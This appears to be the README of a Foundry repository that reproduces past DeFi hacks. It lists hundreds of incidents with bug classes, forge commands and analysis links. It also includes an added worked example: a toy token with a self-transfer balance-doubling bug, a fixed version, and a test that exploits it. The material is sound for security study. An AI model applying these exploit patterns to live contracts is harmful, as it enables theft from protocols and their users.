DeFi Hacks Reproduce - Foundry
Reproduce DeFi hack incidents using Foundry.
379 incidents included.
Let's make Web3 secure! Join Discord
Notion: 101 root cause analyses of past DeFi hack incidents
Transaction debugging tools
Disclaimer: This content serves solely as a proof of concept showcasing past DeFi hacking incidents. It is strictly intended for educational purposes and should not be interpreted as encouraging or endorsing any form of illegal activities or actual hacking attempts. The provided information is for informational and learning purposes only, and any actions taken based on this content are solely the responsibility of the individual. The usage of this information should adhere to applicable laws, regulations, and ethical standards.
All articles are also published on Substack.
OnChain transaction debugging (Ongoing)
List of Past DeFi Incidents
2024
20240401 ATM
20240329 PrismaFi
20240325 ZongZi
20240324 ARK
20240321 SSS
20240320 Paraswap
20240314 MO
20240313 IT
20240309 Juice
20240309 UnizenIO
20240307 GHT
20240306 ALP
20240306 TGBS
20240305 Woofi
20240228 Seneca
20240228 SMOOFSStaking
20240223 CompoundUni
20240223 BlueberryProtocol
20240221 DeezNutz404
20240221 GAIN
20240219 RuggedArt
20240216 ParticleTrade
20240215 DualPools
20240215 Miner
20240211 Game
20240208 Pandora404
20240205 BurnsDefi
20240201 AffineDeFi
20240130 MIMSpell
20240128 BarleyFinance
20240127 CitadelFinance
20240125 NBLGAME
20240117 BmiZapper
20240117 SocketGateway
20240112 WiseLending
20240110 LQDX Alert
20240104 Gamma
20240102 RadiantCapital
20240101 OrbitChain
2023
20231225 Telcoin
20231222 PineProtocol
20231220 TransitFinance
20231217 FloorProtocol
20231216 NFTTrader
20231213 HYPR
20231206 TIME
20231206 ElephantStatus
20231205 BEARNDAO
20231201 UnverifiedContr_0x431abb
20231129 AIS
20231125 TheNFTV2
20231122 KyberSwap
20231117 Token8633_9419
20231117 ShibaToken
20231115 LinkDAO
20231114 OKC Project
20231112 MEV_0x8c2d
20231112 MEV_0xa247
20231111 Mahalend
20231110 Raft_fi
20231110 GrokToken
20231107 MEVbot
20231106 TrustPad
20231106 TheStandard_io
20231102 3913Token
20231101 OnyxProtocol
20231031 UniBotRouter
20231028 AstridProtocol
20231024 MaestroRouter2
20231022 OpenLeverage
20231019 kTAF
20231018 HopeLend
20231018 MicDao
20231013 BelugaDex
20231013 WiseLending
20231012 Platypus
20231011 BH
20231008 pSeudoEth
20231007 StarsArena
20231005 DePayRouter
20230930 FireBirdPair
20230929 DEXRouter
20230926 XSDWETHpool
20230924 KubSplit
20230921 CEXISWAP
20230916 uniclyNFT
20230911 0x0DEX
20230909 BFCToken
20230908 APIG
20230907 HCT
20230905 JumpFarm
20230905 HeavensGate
20230905 FloorDAO
20230902 DAppSocial
20230829 EAC
20230827 Balancer
20230826 SVT
20230824 GSS
20230821 EHIVE
20230819 BTC20
20230818 ExactlyProtocol
20230814 ZunamiProtocol
20230809 EarningFram
20230802 CurveBurner
20230802 Uwerx
20230801 NeutraFinance
20230801 LeetSwap
20230731 GYMNET
20230730 Curve
20230726 Carson
20230724 Palmswap
20230723 MintoFinance
20230722 ConicFinance02
20230721 ConicFinance
20230721 SUT
20230720 Utopia
20230720 FFIST
20230718 APEDAO
20230718 BNO
20230717 NewFi
20230712 Platypus
20230712 WGPT
20230711 RodeoFinance
20230711 Libertify
20230710 ArcadiaFi
20230708 CIVNFT
20230708 Civfund
20230707 LUSD
20230704 BambooIA
20230704 BaoCommunity
20230703 AzukiDAO
20230630 Biswap
20230628 Themis
20230623 SHIDO
20230621 BabyDogeCoin02
20230621 BUNN
20230620 MIM
20230618 ARA
20230617 Pawnfi
20230615 CFC
20230615 DEPUSDT_LEVUSDC
20230612 Sturdy Finance
20230611 SellToken04
20230607 CompounderFinance
20230606 VINU
20230606 UN
20230602 NST SimpleSwap
20230601 DDCoin
20230601 Cellframenet
20230531 ERC20TokenBank
20230529 Jimbo
20230529 BabyDogeCoin
20230529 FAPEN
20230529 NOON_NO
20230525 GPT
20230524 LocalTrade
20230524 CS
20230523 LFI
20230514 landNFT
20230514 SellToken03
20230513 Bitpaidio
20230513 SellToken02
20230512 LW
20230511 SellToken01
20230510 SNK
20230509 MCC
20230509 HODL
20230506 Melo
20230505 DEI
20230503 NeverFall
20230502 Level
20230428 0vix
20230427 SiloFinance
20230424 Axioma
20230419 OLIFE
20230416 Swapos V2
20230415 HundredFinance
20230413 yearnFinance
20230412 MetaPoint
20230411 Paribus
20230409 SushiSwap
20230405 Sentiment
20230402 Allbridge
20230328 SafeMoon Hack
20230328 THENA
20230325 DBW
20230322 BIGFI
20230317 ParaSpace NFT
20230315 Poolz
20230313 EulerFinance
20230308 DKP
20230307 Phoenix
20230227 LaunchZone
20230227 SwapX
20230224 EFVault
20230222 DYNA
20230218 RevertFinance
20230217 Starlink
20230217 Dexible
20230217 Platypusdefi
20230210 Sheep Token
20230210 dForce
20230207 CowSwap
20230206 FDP Token
20230203 Orion Protocol
20230203 Spherax USDs
20230202 BonqDAO
20230130 BEVO
20230126 TomInu Token
20230119 SHOCO Token
20230119 ThoreumFinance
20230118 QTN Token
20230118 UPS Token
20230117 OmniEstate
20230116 MidasCapital
20230111 UFDao
20230111 ROE
20230110 BRA
20230103 GDS
2022
20221230 DFS
20221229 JAY
20221225 Rubic
20221223 Defrost
20221214 Nmbplatform
20221214 FPR
20221213 ElasticSwap
20221212 BGLD
20221211 Lodestar
20221210 MUMUG
20221210 TIFIToken
20221209 NOVAToken
20221207 AES
20221205 RFB
20221205 BBOX
20221202 OverNight
20221201 APC
20221129 MBC & ZZSH
20221129 SEAMAN
20221123 NUM
20221122 AUR
20221121 SDAO
20221119 AnnexFinance
20221117 UEarnPool
20221116 SheepFarm
20221110 DFXFinance
20221109 brahTOPG
20221108 MEV_0ad8
20221108 Kashi
20221107 MooCAKECTX
20221105 BDEX
20221027 VTF
20221027 Team Finance
20221026 N00d Token
20221025 ULME
20221024 Market
20221024 MulticallWithoutCheck
20221021 OlympusDAO
20221020 HEALTH Token
20221020 BEGO Token
20221018 HPAY
20221018 PLTD Token
20221017 Uerii Token
20221014 INUKO Token
20221014 EFLeverVault
20221014 MEVBOT a47b
20221012 ATK
20221011 Rabby Wallet SwapRouter
20221011 Templedao
20221010 Carrot
20221009 Xave Finance
20221006 RES-Token
20221002 Transit Swap
20221001 BabySwap
20221001 RL
20221001 Thunder Brawl
20220929 BXH
20220928 MEVBOT Badc0de
20220923 RADT-DAO
20220913 MevBot Private TX
20220909 DPC
20220908 YYDS
20220908 NewFreeDAO
20220908 Ragnarok Online Invasion
20220906 NXUSD
20220905 ZoomproFinance
20220902 ShadowFi
20220902 Bad Guys by RPF
20220824 LuckyTiger NFT
20220810 XSTABLE Protocol
20220809 ANCH
20220807 EGD Finance
20220802 Nomad Bridge
20220801 Reaper Farm
20220725 LPC
20220723 Audius
20220713 SpaceGodzilla
20220710 Omni NFT
20220706 FlippazOne NFT
20220701 Quixotic - Optimism NFT Marketplace
20220626 XCarnival
20220624 Harmony's Horizon Bridge
20220618 SNOOD
20220616 InverseFinance
20220608 GYMNetwork
20220608 Optimism - Wintermute
20220606 Discover
20220529 NOVO Protocol
20220524 HackDao
20220517 ApeCoin
20220508 Fortress Loans
20220430 Saddle Finance
20220430 Rari Capital/Fei Protocol
20220428 DEUS DAO
20220424 Wiener DOGE
20220423 Akutar NFT
20220421 Zeed Finance
20220416 BeanstalkFarms
20220415 Rikkei Finance
20220412 ElephantMoney
20220411 Creat Future
20220409 GYMNetwork
20220329 Ronin Network
20220329 Redacted Cartel
20220327 Revest Finance
20220326 Auctus
20220322 CompoundTUSDSweepTokenBypass
20220321 OneRing Finance
20220320 LI.FI
20220320 Umbrella Network
20220315 Hundred Finance
20220313 Paraluni
20220309 Fantasm Finance
20220305 Bacon Protocol
20220303 TreasureDAO
20220214 BuildFinance - DAO
20220208 Sandbox LAND
20220206 Meter
20220206 TecraSpace
20220128 Qubit Finance
20220118 Multichain (Anyswap)
2021
20211221 Visor Finance
20211218 Grim Finance
20211214 Nerve Bridge
20211130 MonoX Finance
20211027 Cream Finance
20211015 Indexed Finance
20210916 SushiSwap Miso
20210915 Nimbus Platform
20210915 NowSwap Platform
20210912 ZABU Finance
20210903 DAO Maker
20210830 Cream Finance
20210817 XSURGE
20210811 Poly Network
20210804 WaultFinance
20210728 Levyathan Finance
20210710 Chainswap
20210702 Chainswap
20210628 SafeDollar
20210625 xWin Finance
20210622 Eleven Finance
20210607 88mph NFT
20210603 PancakeHunny
20210527 BurgerSwap
20210519 PancakeBunny
20210508 Rari Capital
20210508 Value Defi
20210502 Spartan
20210428 Uranium
20210308 DODO
20210305 Paid Network
20210125 Sushi Badger Digg
Before 2020
20201229 Cover Protocol
20201121 Pickle Finance
20201026 Harvest Finance
20200804 Opyn Protocol
20200618 Bancor Protocol
20200418 UniSwapV1
20180422 Beauty Chain
20171106 Parity - 'Accidentally Killed It'
Transaction debugging tools
Phalcon | Tx tracer | Cruise | Ethtx | Tenderly | eigenphi
Ethereum Signature Database
4byte | sig db | etherface
ABI to interface | Get ABI for unverified contracts | ETH Calldata Decoder | ETHCMD - Guess ABI | Abi tools
Slowmist | Defillama | De.Fi | Rekt | Cryptosec
List of DeFi Hacks & POCs
20240401 ATM - business logic flaw
forge test --contracts ./src/test/ATM_exp.sol -vvv
ATM_exp.sol
20240329 PrismaFi - Insufficient Validation
forge test --contracts ./src/test/Prisma_exp.sol -vvv
Prisma_exp.sol
https://twitter.com/EXVULSEC/status/1773371049951797485
20240325 ZongZi - Price Manipulation
forge test --contracts src/test/ZongZi_exp.sol -vvv
ZongZi_exp.sol
https://twitter.com/0xNickLFranklin/status/1772195949638775262
20240321 SSS - Token Balance Doubles on Transfer to self
forge test --contracts ./src/test/SSS_exp.sol -vvv
SSS_exp.sol
https://twitter.com/dot_pengun/status/1770989208125272481
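The bug class behind the SSS entry above, self-transfer doubling the sender's balance, as an added example that is not part of the repository and not the SSS contract: a constructed toy token whose transfer() caches both balances before writing them back, the hardened form beside it, and a Foundry test in the same shape as the PoCs listed on this page. The contract names, the 1,000-token seed and the file path in the usage note are assumptions; it needs only forge-std.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Constructed toy token (not the SSS contract). transfer() reads both balances
// into locals before writing them back, so when from == to the second write
// overwrites the debit with the credited copy and the balance doubles.
contract SelfTransferToken {
    mapping(address => uint256) public balanceOf;
    uint256 public totalSupply;

    constructor(uint256 supply) {
        balanceOf[msg.sender] = supply;
        totalSupply = supply;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        uint256 fromBalance = balanceOf[msg.sender];
        uint256 toBalance = balanceOf[to]; // stale copy when to == msg.sender
        require(fromBalance >= amount, "insufficient");
        balanceOf[msg.sender] = fromBalance - amount;
        balanceOf[to] = toBalance + amount; // overwrites the debit above
        return true;
    }
}

// Hardened form: update storage in place, so a self-transfer is a no-op.
contract FixedToken {
    mapping(address => uint256) public balanceOf;
    uint256 public totalSupply;

    constructor(uint256 supply) {
        balanceOf[msg.sender] = supply;
        totalSupply = supply;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount; // correct even when to == msg.sender
        return true;
    }
}

contract SelfTransfer_exp is Test {
    SelfTransferToken vuln;
    FixedToken fixed_;
    address attacker = makeAddr("attacker");
    uint256 constant SEED = 1_000 ether; // assumed seed balance

    function setUp() public {
        vuln = new SelfTransferToken(SEED);
        fixed_ = new FixedToken(SEED);
        vuln.transfer(attacker, SEED);
        fixed_.transfer(attacker, SEED);
    }

    function testSelfTransferDoublesBalance() public {
        vm.startPrank(attacker);
        uint256 before = vuln.balanceOf(attacker);
        emit log_named_decimal_uint("attacker balance before", before, 18);

        // Each self-transfer of the full balance doubles it; ten rounds give 1024x.
        for (uint256 i = 0; i < 10; i++) {
            vuln.transfer(attacker, vuln.balanceOf(attacker));
        }
        uint256 after_ = vuln.balanceOf(attacker);
        emit log_named_decimal_uint("attacker balance after", after_, 18);
        vm.stopPrank();

        assertEq(after_, before << 10);
        // Tokens were created out of thin air: one holder now exceeds totalSupply.
        assertGt(after_, vuln.totalSupply());
    }

    function testFixedTokenIsUnaffected() public {
        vm.prank(attacker);
        fixed_.transfer(attacker, SEED);
        assertEq(fixed_.balanceOf(attacker), SEED);
    }
}
```

Save it as src/test/SelfTransfer_exp.sol in a Foundry project and run it the same way as the entries on this page: forge test --contracts ./src/test/SelfTransfer_exp.sol -vvv (add --gas-report to see the per-call cost of each doubling round). No fork is needed because both tokens are deployed locally in setUp; the real PoCs instead call vm.createSelectFork at the block before the incident. When reviewing a token, check every path where from and to can alias (transfer, transferFrom, burn-then-mint helpers) and prefer in-place += / -= on storage over read-modify-write through locals.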
20240324 ARK - business logic flaw
forge test --contracts src/test/ARK_exp.sol -vvv
ARK_exp.sol
https://twitter.com/Phalcon_xyz/status/1771728823534375249
20240320 Paraswap - Incorrect Access Control
forge test --contracts src/test/Paraswap_exp.sol -vvv --evm-version shanghai
Paraswap_exp.sol
https://medium.com/neptune-mutual/analysis-of-the-paraswap-exploit-1f97c604b4fe
20240314 MO - business logic flaw
forge test --contracts src/test/MO_exp.sol -vvv
MO_exp.sol
https://twitter.com/0xNickLFranklin/status/1768184024483430523
20240313 IT - business logic flaw
forge test --via-ir --contracts src/test/IT_exp.sol -vvv
IT_exp.sol
https://twitter.com/0xNickLFranklin/status/1768171595561046489
20240309 Juice - Business Logic Flaw
forge test --contracts ./src/test/Juice_exp.sol -vvv
Juice_exp.sol
https://medium.com/@juicebotapp/juice-staking-exploit-next-steps-95e218b3ec71
20240309 UnizenIO - unverified external call
forge test --contracts src/test/UnizenIO_exp.sol -vvvv
UnizenIO_exp.sol | UnizenIO2_exp.sol
https://twitter.com/Phalcon_xyz/status/1766274000534004187
https://twitter.com/AnciliaInc/status/1766261463025684707
20240307 GHT - Business Logic Flaw
forge test --contracts ./src/test/GHT_exp.sol -vvv
GHT_exp.sol
20240306 ALP - Public internal function
forge test --contracts ./src/test/ALP_exp.sol -vvv
ALP_exp.sol
https://twitter.com/0xNickLFranklin/status/1765296663667875880
20240306 TGBS - Business Logic Flaw
forge test --contracts ./src/test/TGBS_exp.sol -vvv
TGBS_exp.sol
https://twitter.com/0xNickLFranklin/status/1765290290083144095
https://twitter.com/Phalcon_xyz/status/1765285257949974747
20240305 Woofi - Price Manipulation
forge test --contracts ./src/test/Woofi_exp.sol -vvv
Woofi_exp.sol
https://twitter.com/spreekaway/status/1765046559832764886
https://twitter.com/PeckShieldAlert/status/1765054155478175943
20240228 Seneca - Arbitrary External Call Vulnerability
forge test --contracts ./src/test/Seneca_exp.sol -vvv
Seneca_exp.sol
https://twitter.com/Phalcon_xyz/status/1763045563040411876
20240228 SMOOFSStaking - Reentrancy
forge test --contracts ./src/test/SMOOFSStaking_exp.sol -vvv
SMOOFSStaking_exp.sol
https://twitter.com/AnciliaInc/status/1762893563103428783
https://twitter.com/0xNickLFranklin/status/1762895774311178251
20240223 CompoundUni - Oracle bad price
forge test --contracts ./src/test/CompoundUni_exp.sol -vvv
CompoundUni_exp.sol
https://twitter.com/0xLEVI104/status/1762092203894276481
20240223 BlueberryProtocol - logic flaw
forge test --contracts ./src/test/BlueberryProtocol_exp.sol -vvv
BlueberryProtocol_exp.sol
https://twitter.com/blueberryFDN/status/1760865357236211964
20240221 DeezNutz 404 - lack of validation
forge test --contracts ./src/test/DeezNutz404_exp.sol -vvv
DeezNutz404_exp.sol
https://twitter.com/0xNickLFranklin/status/1760481343161700523
20240221 GAIN - bad function implementation
forge test --contracts ./src/test/GAIN_exp.sol -vvv
GAIN_exp.sol
https://twitter.com/0xNickLFranklin/status/1760559768241160679
20240219 RuggedArt - reentrancy
forge test --contracts ./src/test/RuggedArte_exp.sol -vvv
RuggedArte_exp.sol
https://twitter.com/EXVULSEC/status/1759822545875025953
20240216 ParticleTrade - lack of validation data
forge test --contracts ./src/test/ParticleTrade_exp.sol -vvv
ParticleTrade_exp.sol
https://twitter.com/Phalcon_xyz/status/1758028270770250134
20240215 DualPools - precision truncation
forge test --contracts ./src/test/DualPools_exp.sol -vvvv
DualPools_exp.sol
https://medium.com/@lunaray/dualpools-hack-analysis-5209233801fa
20240215 Miner - lack of validation dst address
forge test --contracts ./src/test/Miner_exp.sol -vvv --evm-version shanghai
Miner_exp.sol
https://twitter.com/Phalcon_xyz/status/1757777340002681326
20240211 Game - Reentrancy && Business Logic Flaw
forge test --contracts ./src/test/Game_exp.sol -vvv
Game_exp.sol
https://twitter.com/AnciliaInc/status/1757533144033739116
20240208 Pandora - integer underflow
forge test --contracts ./src/test/PANDORA_exp.sol -vvv
PANDORA_exp.sol
https://twitter.com/pennysplayer/status/1766479470058406174
20240205 BurnsDefi - Price Manipulation
forge test --contracts ./src/test/BurnsDefi_exp.sol -vvv
BurnsDefi_exp.sol
https://twitter.com/pennysplayer/status/1754342573815238946
https://medium.com/neptune-mutual/how-was-citadel-finance-exploited-a5f9acd0b408 (similar incident)
20240201 AffineDeFi - lack of validation userData
forge test --contracts ./src/test/AffineDeFi_exp.sol -vvv
AffineDeFi_exp.sol
https://twitter.com/Phalcon_xyz/status/1753020812284809440
https://twitter.com/CyversAlerts/status/1753040754287513655
20240130 MIMSpell - Precision Loss
forge test --contracts ./src/test/MIMSpell2_exp.sol -vvv
MIMSpell2_exp.sol
https://twitter.com/kankodu/status/1752581744803680680
https://twitter.com/Phalcon_xyz/status/1752278614551216494
https://twitter.com/peckshield/status/1752279373779194011
https://phalcon.blocksec.com/explorer/security-incidents
20240128 BarleyFinance - Reentrancy
forge test --contracts ./src/test/BarleyFinance_exp.sol -vvv
BarleyFinance_exp.sol
https://phalcon.blocksec.com/explorer/security-incidents
https://www.bitget.com/news/detail/12560603890246
https://twitter.com/Phalcon_xyz/status/1751788389139992824
20240127 CitadelFinance - Price Manipulation
forge test --contracts ./src/test/CitadelFinance_exp.sol -vvv
CitadelFinance_exp.sol
https://medium.com/neptune-mutual/how-was-citadel-finance-exploited-a5f9acd0b408
20240125 NBLGAME - Reentrancy
forge test --contracts ./src/test/NBLGAME_exp.sol -vvv
NBLGAME_exp.sol
https://twitter.com/SlowMist_Team/status/1750526097106915453
https://twitter.com/AnciliaInc/status/1750558426382635036
20240117 BmiZapper - Arbitrary external call vulnerability
forge test --contracts ./src/test/BmiZapper_exp.sol -vvv
BmiZapper_exp.sol
https://x.com/0xmstore/status/1747756898172952725
20240117 SocketGateway - Lack of calldata validation
forge test --contracts ./src/test/SocketGateway_exp.sol -vvv --evm-version shanghai
SocketGateway_exp.sol
https://twitter.com/BeosinAlert/status/1747450173675196674
https://twitter.com/peckshield/status/1747353782004900274
20240112 WiseLending - Loss of Precision
forge test --contracts ./src/test/WiseLending02_exp.sol -vvv --evm-version shanghai
WiseLending02_exp.sol
https://twitter.com/EXVULSEC/status/1746829519334650018
https://twitter.com/peckshield/status/1745907642118123774
20240110 LQDX - Unauthorized TransferFrom
forge test --contracts src/test/LQDX_alert_exp.sol -vvv
LQDX_alert_exp.sol
https://twitter.com/SlowMist_Team/status/1744972012865671452
20240104 Gamma - Price manipulation
forge test --contracts ./src/test/Gamma_exp.sol -vvv
Gamma_exp.sol
https://twitter.com/officer_cia/status/1742772207997050899
https://twitter.com/shoucccc/status/1742765618984829326
20240102 RadiantCapital - Loss of Precision
forge test --contracts ./src/test/RadiantCapital_exp.sol -vvv
RadiantCapital_exp.sol
https://neptunemutual.com/blog/how-was-radiant-capital-exploited/
https://twitter.com/BeosinAlert/status/1742389285926678784
20240101 OrbitChain - Incorrect input validation
forge test --contracts ./src/test/OrbitChain_exp.sol -vvv
OrbitChain_exp.sol
https://blog.solidityscan.com/orbit-chain-hack-analysis-b71c36a54a69
Foundry can also report the gas used per function call, mimicking the behavior of hardhat-gas-reporter. For an exploit PoC this matters: if a call in the attack path burns a very large amount of gas, the attack is less likely to be profitable once mainnet gas prices are accounted for, and gas optimization is an important part of smart contract development in general.
Every PoC in this repository can produce a gas report like this:
forge test --gas-report --contracts <contract> -vvv
For Example:
Let us find out the gas used in the Audius PoC:
Execution
forge test --gas-report --contracts ./src/test/Audius_exp.sol -vvv
Demo
Moved to DeFiVulnLabs
Moved to DeFiLabs